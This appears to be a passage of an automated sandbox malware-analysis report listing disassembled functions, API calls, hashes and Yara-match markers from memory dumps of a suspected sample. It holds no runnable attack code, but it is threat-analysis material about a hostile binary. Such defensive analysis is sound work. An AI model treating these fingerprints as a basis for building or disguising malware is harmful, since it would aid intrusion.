Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

Part of subcall function 02152141: _free.LIBCMT ref: 021521A0
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0215BCB5
IsValidCodePage.KERNEL32(00000000), ref: 0215BD10
IsValidLocale.KERNEL32(?,00000001), ref: 0215BD1F
GetLocaleInfoW.KERNEL32(?,00001001,02150A1C,00000040,?,02150B3C,00000055,00000000,?,?,00000055,00000000), ref: 0215BD67
GetLocaleInfoW.KERNEL32(?,00001002,02150A9C,00000040), ref: 0215BD86

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: 0dbc46593606c6cba40b4b4860aa19400b2af7716b5799c0989cf7ccc27a9dbc
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: CC51A371944229EFDB20DFA5CC40ABE77B9EF04708F0404A9ED24EB294EB719B01CB65

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84
C, xrefs: 0042EF48, 0042ED32, 0042EBC1

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0215B271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02150A23,?,?,?,?,0215047A,?,00000004), ref: 0215B353
_wcschr.LIBVCRUNTIME ref: 0215B3E3
_wcschr.LIBVCRUNTIME ref: 0215B3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02150A23,00000000,02150B43), ref: 0215B494

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 1bdfa9d4bbfc98338b67f5a2744407dacd13d8d7f8ca3af74ab0d30099dffad9
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: C261FA71684226EED724AF34CC41BBB73ADEF04718F1445A9ED26D7184EB74E640CBA0

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0214A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0212DAD7), ref: 0214A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0212DAD7), ref: 0214A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0212DAD7), ref: 0214A749

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 6c7dc6e38017473173965b3673f9e11a2bcc60766f3cf5b3e739c2263e24c7c0
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: D531C77494131C9BCB21DF64DD88B9CBBB8BF08711F5041EAE40CA7250EB309B858F44

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 021500C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0215009C,00000000,00457970,0000000C,021501F3,00000000,00000002,00000000), ref: 021500E7
TerminateProcess.KERNEL32(00000000,?,0215009C,00000000,00457970,0000000C,021501F3,00000000,00000002,00000000), ref: 021500EE
ExitProcess.KERNEL32 ref: 02150100

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: c4b2f60779ba15f47c370bcf54b0f1131abee0df5897a2089ae5a3ea46abfd5d
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 13E0B635080158EFCF116F94DD48A593B6AEF4AB86B5040A8FD258B131CB36DA42DA44

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 0212092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 021209DC, 021209DF, 021209E4
., xrefs: 0212095F
l, xrefs: 02120966

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: c47a0ca15b32ba9ed95b3f1139f05f2783e18e5976a0671db0a234a546f7024c
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: F23169B6901619CFDB10CF99C880AAEBBF5FF18324F15414AE445B7210D771EA59CFA4

Function 02158C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 02158D23

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: 6048d82df8d7591915922f64e512b7af8ab0c2ab67d21ca34abfb81cd04791be
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: E2412672540229EECB209FB9CC48EAB77B9EB80714F1042A9ED15CB180E7719D81CB50

Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438ABC

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 0214ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 06b2dd473b8bc18c666e3d42fe6f4a42c92cfbaa588d910ba1baf5c0d4465c40
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: 25021C71E402199FDF14CFA9C8906ADB7F2FF88714F258269D919E7784DB31A942CB80

Function 02122605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0212262C
PostQuitMessage.USER32(00000000), ref: 021227CA

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 2a5b72282fb29ca95df501dafcf67312a562d430a3a77f2667bccdf25739de74
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 31414125964344A5E730FFA4BC45B2533B0FF64722F10252BE528CB2B2E3B28554C75E

Function 02156F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02156F21,?,?,00000008,?,?,0215F3E2,00000000), ref: 02157153

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 82a0fda67b383fb89ba8441391cc934519f009d17d39e456c7593a53a87bc3a1
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: C5B12B31650618DFD719CF28C48AB65BBE1FF45368F258698E8A9CF2E1C335D992CB40

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 0215B8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

Part of subcall function 02152141: _free.LIBCMT ref: 021521A0
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0215B900

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: 8ac89f766487b4020ebc3dd44efcc18cab8905446f0fa148366470ac35648bd8
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: EA2183B259422ADFDF249F24DC41BBA77ADEF04318F1001BAED11D6154EB399A44CB50

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 0215B534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,02150A1C,?,0215BC89,00000000,?,?,?), ref: 0215B5A6

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: 51b9155cb2f9719646993c9c0efe00f9031f8e7685dcf35fb3f264d009aa63ba
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 3C11253B2147119FDB1C9F39C8A16BABB92FF84318B14482CDE5687A40D371B602CB40

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 0215BADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0215B87A,00000000,00000000,?), ref: 0215BB08

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: f63bd8e1dfa545780bc6b508a236cd224d1b1f4ca54654a9f6b2ad46b44c8e5e
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: 8AF0F932A84535EBDB385A24CC45BBAB759EB4071CF0504A9DC25A3148EBB4BF01C6D0

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 0215B8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

